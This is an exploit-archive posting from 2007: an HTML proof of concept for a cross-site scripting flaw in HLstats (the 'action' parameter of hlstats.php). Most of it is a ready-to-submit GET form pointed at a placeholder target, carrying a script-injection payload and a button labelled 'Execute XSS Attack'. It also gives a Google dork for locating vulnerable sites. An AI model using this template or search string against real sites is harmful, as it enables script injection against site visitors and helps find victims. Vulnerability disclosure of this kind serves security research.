Home / exploitsPDF  

hlstarts-xss2.txt

Posted on 22 May 2007

<!-- HLstats v1.35 - Cross-Site Scripting Vulnerability #2 Vulnerable Variable: action Vulnerable File: hlstats.php Vulnerable: HLstats 1.2 (other versions may also be vulnerable) Google d0rk: "generated in real-time by HLstats" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 17th, 2007 !--> <html> <head><title>HLstats v1.35 - Cross-Site Scripting Vulnerability #2</title><body> <center><br><br> <font size=4>HLstats v1.35 - Cross-Site Scripting Vulnerability #2</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=%22generated+in+real-time+by+hlstats%22">&quot;generated in real-time by HLstats&quot;</a> </font><br><br><br> <center>file <b>hlstats.php</b> - variable <b>action</b> - method <b>get</b></center><br> <form action="http://www.target.com/index.php" method="get"> <input size=75 name="action" value="<script %0a%0d>alert(1)</script>"> <input type="hidden" name="mode" value="actioninfo"> <input type="hidden" name="game" value="cstrike"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </body></html>

 

TOP